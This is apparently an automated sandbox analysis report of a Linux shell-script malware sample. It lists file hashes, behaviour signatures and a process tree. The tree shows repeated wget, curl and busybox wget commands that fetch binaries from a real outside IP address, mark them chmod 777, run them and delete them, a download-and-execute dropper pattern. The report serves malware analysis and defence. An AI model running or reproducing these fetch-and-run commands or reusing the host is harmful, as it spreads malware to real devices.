Analysis
-
max time kernel
55s -
max time network
57s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 04:36
Static task
static1
Behavioral task
behavioral1
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
-
Size
10KB
-
MD5
3dd5c19ec5fe98baa364142d535458dd
-
SHA1
07c95352a7b1f0aa31bea494cd8e2e4f6dfab78f
-
SHA256
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb
-
SHA512
81bcbab2896b757cdebbc6b90b866f6a591c375036fd0043391e2b28b69a7d3fdb2471e023cdf9a613e4e8c0ad008231e4089365151a7e6249a8825b5eb7a479
-
SSDEEP
192:sUA5CiAJnvavrYnXpapai2b66+SeKLDsvrYnXZ+i2b66SSe+dUA5CiKnv1:sUA5CiAJnv/apmHRSUA5CiKnv1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 957 chmod 864 chmod 915 chmod 891 chmod 897 chmod 770 chmod 870 chmod 939 chmod 735 chmod 909 chmod 927 chmod 963 chmod 810 chmod 816 chmod 933 chmod 741 chmod 858 chmod 945 chmod 951 chmod 969 chmod 975 chmod 885 chmod 903 chmod 921 chmod 879 chmod 841 chmod 747 chmod 797 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 736 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 742 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 748 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 772 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX 798 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 811 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs 817 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 842 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk 859 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR 865 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 871 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi 880 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 886 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 892 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 898 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 904 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX 910 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs 916 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 922 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk 928 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR 934 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 940 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi 946 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 952 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 958 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 964 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 970 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 976 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 940 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 941 rm 802 wget 808 curl 809 busybox 811 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 937 curl 812 rm 936 wget 938 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs curl File opened for modification /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo curl File opened for modification /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 curl File opened for modification /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 curl File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl File opened for modification /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 curl File opened for modification /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 curl File opened for modification /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX curl File opened for modification /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 curl File opened for modification /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi curl File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo curl File opened for modification /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR curl File opened for modification /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk curl File opened for modification /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX curl File opened for modification /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs curl File opened for modification /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 curl File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY curl File opened for modification /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 curl File opened for modification /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi curl File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY curl File opened for modification /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 curl
Processes
-
/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:733
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:740
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:746
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:764
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:790
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:811
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:815
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:836
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:857
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:863
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:869
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:878
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:884
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:890
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:896
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:902
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:908
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:914
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:920
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:926
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
